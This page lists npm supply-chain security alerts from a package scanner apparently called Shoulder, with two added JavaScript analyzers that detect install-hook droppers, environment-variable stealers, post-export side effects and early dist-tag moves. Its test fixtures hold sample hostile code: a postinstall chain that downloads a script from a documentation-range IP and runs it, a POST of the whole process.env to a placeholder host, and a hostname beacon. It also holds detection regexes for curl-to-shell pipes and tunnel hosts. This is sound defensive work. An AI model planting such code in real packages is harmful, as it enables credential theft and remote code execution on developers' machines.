Security Alerts
Signals from Shoulder's ecosystem analysis: newly scanned packages, detected risk changes and identified vulnerabilities.
Alerts are generated when Shoulder analyzes a package and detects signals that are worth reviewing. Each alert links to a full threat report.
Payload delivery from suspicious source: IOC URL + execution capability
Install-time exfil signature: install hook + credential/env access + outbound network + obfuscated payload
- NEW obfuscation in this version + shell exec + network — encrypted-payload update shape (spawn/exec path)
- Obfuscated shell execution — concealment pattern
Payload delivery from suspicious source: IOC URL + execution capability
- Bulk env-var sweep + shell exec at runtime — credential-stealer
- Bulk env-var sweep (cap-bulk-env-access reads ALL of process.env) + outbound network — credential-stealer
- Install hook spawns dynamic / forked-detached shell — dropper attribution
- Install hook sends traffic to flagged target (raw IP / paste site / tunnel) — dropper
- Install hook writes to system paths (/etc/, /usr/, etc.) — review for persistence
- Install hook + shell exec + network — dropper shape (scopes may be install or runtime; install hook can transitively reach runtime caps via the postinstall entrypoint)
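As an added example (not Shoulder's own scanner), the toy analyzer below shows how the install-hook and credential-stealer alerts above can be derived from a package's manifest and sources: it reads the install hooks from package.json, follows the script each hook invokes through relative require() calls (which is how an install hook transitively reaches "runtime" capabilities in other modules), tags every reachable file with coarse capability regexes, and fires a rule when the capabilities that rule needs co-occur in the required scope. The rule ids, the regexes, the flagged-host list and both package fixtures are constructed for this example; 203.0.113.5 is from the RFC 5737 documentation range.

```javascript
// Added example, not Shoulder's scanner: a toy static analyzer that reproduces the
// signal combinations behind the install-hook alerts above. A package is given as
// an in-memory map of file name -> source, so nothing is installed or executed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Capability detectors. Assumed, deliberately coarse ('exec(' also matches RegExp.exec).
const CAPS = {
  shellExec: /\b(?:execSync|execFileSync|spawnSync|exec|execFile|spawn|fork)\s*\(|\b(?:curl|wget)\b[^|\n]*\|\s*(?:sh|bash)\b/,
  detachedShell: /detached\s*:\s*true/,
  network: /\brequire\(\s*['"](?:https?|net|dns|tls)['"]\s*\)|\bfetch\s*\(/,
  // raw IP literal, paste site or tunnel host; the host list is a constructed sample
  flaggedTarget: /\b(?:\d{1,3}\.){3}\d{1,3}\b|pastebin\.com|ngrok(?:-free)?\.(?:io|app)|trycloudflare\.com/,
  bulkEnv: /(?:Object\.(?:keys|entries|assign)|JSON\.stringify)\(\s*(?:\{\s*\},\s*)?process\.env\b|\.\.\.process\.env\b/,
  dynamicEval: /\beval\s*\(|\bnew\s+Function\s*\(/,
  systemPathWrite: /\b(?:writeFileSync|writeFile|appendFileSync|appendFile|createWriteStream)\s*\(\s*['"`]\/(?:etc|usr|bin|sbin)\//,
  obfuscation: /(?:\\x[0-9a-fA-F]{2}){4,}|String\.fromCharCode\s*\(|\batob\s*\(/,
};

// Alert rules: capabilities that must co-occur, and where. 'install' = reachable from
// an install hook, 'runtime' = reachable from the main entrypoint, 'any' = either.
const RULES = [
  { id: 'install-hook-dropper-shape', scope: 'install', needs: ['shellExec', 'network'] },
  { id: 'install-hook-detached-shell', scope: 'install', needs: ['shellExec', 'detachedShell'] },
  { id: 'install-hook-flagged-target', scope: 'install', needs: ['flaggedTarget'] },
  { id: 'install-hook-system-path-write', scope: 'install', needs: ['systemPathWrite'] },
  { id: 'runtime-env-sweep-shell-exec', scope: 'runtime', needs: ['bulkEnv', 'shellExec'] },
  { id: 'runtime-env-sweep-network', scope: 'runtime', needs: ['bulkEnv', 'network'] },
  { id: 'eval-network-shell-trio', scope: 'any', needs: ['dynamicEval', 'network', 'shellExec'] },
  { id: 'obfuscated-shell-exec', scope: 'any', needs: ['obfuscation', 'shellExec'] },
];

// Resolve './x' the way require() would against the file map: x, x.js, x/index.js.
function resolveFile(files, ref) {
  const base = ref.replace(/^\.\//, '');
  return [base, base + '.js', base + '/index.js'].find((f) => f in files) || null;
}

// Files transitively reachable from the entry files via relative require() calls.
// This is what lets an install hook reach "runtime" capabilities in other modules.
function reachable(files, entries) {
  const seen = new Set();
  const queue = entries.map((e) => resolveFile(files, e)).filter(Boolean);
  while (queue.length) {
    const f = queue.shift();
    if (seen.has(f)) continue;
    seen.add(f);
    for (const m of files[f].matchAll(/require\(\s*['"](\.\/[^'"]+)['"]\s*\)/g)) {
      const dep = resolveFile(files, m[1]);
      if (dep) queue.push(dep);
    }
  }
  return [...seen];
}

// Local script files an install hook command invokes, e.g. "node setup.js".
function hookEntries(cmd) {
  return cmd.match(/\.?\/?[\w./-]+\.[cm]?js\b/g) || [];
}

const capsIn = (text) => Object.keys(CAPS).filter((c) => CAPS[c].test(text));

// Capabilities in the hook command text itself plus everything the entries reach.
function scopeCaps(files, entries, extraText) {
  const caps = new Set(capsIn(extraText));
  for (const f of reachable(files, entries)) capsIn(files[f]).forEach((c) => caps.add(c));
  return caps;
}

function scanPackage({ manifest, files }) {
  const hooks = INSTALL_HOOKS.map((h) => manifest.scripts && manifest.scripts[h]).filter(Boolean);
  const install = scopeCaps(files, hooks.flatMap(hookEntries), hooks.join('\n'));
  const runtime = scopeCaps(files, [manifest.main || 'index.js'], '');
  const scopes = { install, runtime, any: new Set([...install, ...runtime]) };
  const alerts = RULES.filter((r) => r.needs.every((c) => scopes[r.scope].has(c))).map((r) => r.id);
  return { install: [...install], runtime: [...runtime], alerts };
}

// Constructed fixture: postinstall -> setup.js -> lib/fetch-stage2.js, which pulls a
// script from a raw IP (203.0.113.0/24 is the RFC 5737 documentation range) and runs
// it; the runtime entrypoint separately posts the whole environment to a collector.
const SAMPLE_DROPPER = {
  manifest: { name: 'example-fixture', version: '1.0.0', main: 'index.js', scripts: { postinstall: 'node setup.js' } },
  files: {
    'setup.js': "require('./lib/fetch-stage2');\n",
    'lib/fetch-stage2.js': [
      "const https = require('https'), { execSync } = require('child_process');",
      "https.get('https://203.0.113.5/s2.sh', (res) => { let b = '';",
      "  res.on('data', (d) => (b += d)); res.on('end', () => execSync(b)); });",
    ].join('\n'),
    'index.js': [
      "const https = require('https');",
      "https.request({ host: 'collector.example', method: 'POST' }).end(JSON.stringify(process.env));",
      'module.exports = { pad: (s, n) => s.padStart(n) };',
    ].join('\n'),
  },
};

// Constructed fixture: a benign native-addon build; no rule should fire.
const SAMPLE_BENIGN = {
  manifest: { name: 'example-addon', version: '2.1.0', main: 'index.js', scripts: { install: 'node-gyp rebuild' } },
  files: { 'index.js': "module.exports = require('./build/Release/addon.node');\n" },
};

if (typeof require !== 'undefined' && require.main === module) console.log(scanPackage(SAMPLE_DROPPER));
```

For the dropper fixture the install scope ends up with shellExec, network and flaggedTarget (all of them two hops away from the postinstall command) and the runtime scope with network and bulkEnv, so three rules fire; the benign fixture fires none. A real scanner would replace the regexes with AST- or call-graph-based capability analysis, since plain pattern matching both misses aliased calls and flags harmless ones.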
Manifest version doesn't match any embedded version constant in the bundle — bundle may not have been rebuilt from the published manifest; review release pipeline and corroborating signals
- Sensitive file access with network egress — credential exfiltration pattern
npm main entrypoint contains side-effecting code AFTER its last module.exports / export default — runs silently on require() and reaches a dangerous capability (install-hook bypass)
Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
- Dynamic code evaluation with network access — potential code injection or exfiltration
Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
- Dynamic code evaluation with network access — potential code injection or exfiltration
Install hook writes to system paths (/etc/, /usr/, etc.) — review for persistence
Suspicious install-time execution: 2+ suspicious signals during install
- A dist-tag (e.g. latest) was moved to this version while it was less than 1 hour old — publish-side compromise indicator
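The manifest-version mismatch alert, the side-effecting-code-after-last-export alert and the dist-tag signal above are all checks on metadata and entrypoint shape rather than on capability combinations. As an added example (not Shoulder's code), the block below implements a simplified version of each: a search for version constants embedded in the bundle compared against the manifest version, a scan of whatever follows the last `module.exports` / `export default` statement in the entrypoint, and an age check for the version a dist-tag points at. The packument shape follows the npm registry's `dist-tags` and `time` fields; using `time.modified` as a proxy for when the tag moved, the regexes and all fixtures are assumptions made for the example (203.0.113.9 is from the RFC 5737 documentation range).

```javascript
// Added example, not Shoulder's code: three checks that approximate the manifest
// version, hidden-entrypoint and dist-tag signals above. All inputs are plain
// objects and strings, so the checks run offline.

// Index just past the statement that starts at `from`: tracks ()/[]/{} nesting and
// stops at the first top-level ';' or newline. Coarse on purpose: brackets inside
// string literals are not special-cased.
function statementEnd(src, from) {
  let depth = 0;
  for (let i = from; i < src.length; i++) {
    const ch = src[i];
    if ('([{'.includes(ch)) depth++;
    else if (')]}'.includes(ch)) depth--;
    else if (depth === 0 && (ch === ';' || ch === '\n')) return i + 1;
  }
  return src.length;
}

// Capabilities worth flagging in code that runs on a bare require(). Assumed patterns.
const DANGEROUS = {
  shellExec: /\b(?:execSync|spawnSync|exec|execFile|spawn|fork)\s*\(/,
  network: /\brequire\(\s*['"](?:https?|net|dns|tls)['"]\s*\)|\bfetch\s*\(/,
  dynamicEval: /\beval\s*\(|\bnew\s+Function\s*\(/,
};

// Side-effecting code after the last module.exports / export default: it runs on every
// require() of the package with no install hook involved. Only whole-line comments are
// stripped, so the '//' inside a URL literal is left alone.
function postExportSideEffects(src) {
  let last = -1;
  for (const m of src.matchAll(/module\.exports\b|\bexport\s+default\b/g)) last = m.index;
  if (last === -1) return { trailingCode: false, capabilities: [] };
  const tail = src
    .slice(statementEnd(src, last))
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/^\s*\/\/.*$/gm, '')
    .trim();
  return {
    trailingCode: tail.length > 0,
    capabilities: Object.keys(DANGEROUS).filter((c) => DANGEROUS[c].test(tail)),
  };
}

// Manifest version vs. version constants embedded in the bundle. If constants exist and
// none equals the manifest version, the bundle may not have been rebuilt for this release.
function versionConstantMismatch(manifestVersion, bundleSources) {
  const re = /\bversion\b\s*[:=]\s*['"](\d+\.\d+\.\d+[^'"]*)['"]/gi;
  const embedded = new Set();
  for (const src of bundleSources) for (const m of src.matchAll(re)) embedded.add(m[1]);
  if (embedded.size === 0) return { applicable: false, embedded: [], mismatch: false };
  return { applicable: true, embedded: [...embedded], mismatch: !embedded.has(manifestVersion) };
}

// Dist-tag pointing at a version less than maxAgeMs old. `observedAt` is when the scanner
// saw the tag move; when absent, the packument's time.modified is used as a proxy
// (assumption: the tag move was the registry document's last modification).
function distTagMovedEarly(packument, tag, observedAt, maxAgeMs = 60 * 60 * 1000) {
  const version = packument['dist-tags'] && packument['dist-tags'][tag];
  if (!version || !packument.time || !packument.time[version]) return { version, flagged: false };
  const published = Date.parse(packument.time[version]);
  const seen = observedAt != null ? observedAt : Date.parse(packument.time.modified);
  const ageMs = seen - published;
  return { version, ageMs, flagged: ageMs >= 0 && ageMs < maxAgeMs };
}

// Constructed fixtures (203.0.113.0/24 is the RFC 5737 documentation range).
const ENTRY_WITH_BEACON = [
  'const pad = (s, n) => s.padStart(n);',
  'module.exports = { pad };',
  '// telemetry',
  "require('https').get('https://203.0.113.9/ping?h=' + require('os').hostname());",
].join('\n');
const ENTRY_CLEAN = 'const pad = (s, n) => s.padStart(n);\nmodule.exports = { pad };\n// end of file\n';
const STALE_BUNDLE = 'const VERSION = "1.3.2";\nexports.version = VERSION;\n';
const PACKUMENT = {
  name: 'example-fixture',
  'dist-tags': { latest: '1.4.0' },
  time: {
    created: '2023-11-02T08:00:00.000Z',
    '1.3.2': '2024-02-14T09:30:00.000Z',
    '1.4.0': '2024-05-01T10:00:00.000Z',
    modified: '2024-05-01T10:20:00.000Z',
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(postExportSideEffects(ENTRY_WITH_BEACON));
  console.log(versionConstantMismatch('1.4.0', [STALE_BUNDLE]));
  console.log(distTagMovedEarly(PACKUMENT, 'latest'));
}
```

The beacon fixture is reported as trailing code with a network capability, the clean entrypoint is not; the stale bundle embeds 1.3.2 while the manifest says 1.4.0, so it mismatches; and `latest` in the packument points at a version that was twenty minutes old when the document was last modified, so the dist-tag check fires, whereas the same check with an observation time two days later does not. The version-constant check deliberately returns `applicable: false` when the bundle embeds no version at all, since absence of a constant is not evidence either way.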
Behavioral change: new process control without corroborating signals
Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
- Install hook + shell exec + network — dropper shape (scopes may be install or runtime; install hook can transitively reach runtime caps via the postinstall entrypoint)
- Dynamic code evaluation with network access — potential code injection or exfiltration
Install hook writes to system paths (/etc/, /usr/, etc.) — review for persistence
- Install hook + shell exec + network — dropper shape (scopes may be install or runtime; install hook can transitively reach runtime caps via the postinstall entrypoint)
Payload delivery from suspicious source: IOC URL + execution capability
- Dynamic / forked-detached shell paired with code obfuscation — runtime dropper attribution (no install hook required)
- Bulk env-var sweep + shell exec at runtime — credential-stealer
- Bulk env-var sweep (cap-bulk-env-access reads ALL of process.env) + outbound network — credential-stealer
- Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
- Obfuscated shell execution — concealment pattern
- Dynamic code evaluation with network access — potential code injection or exfiltration
Behavioral change: new process control without corroborating signals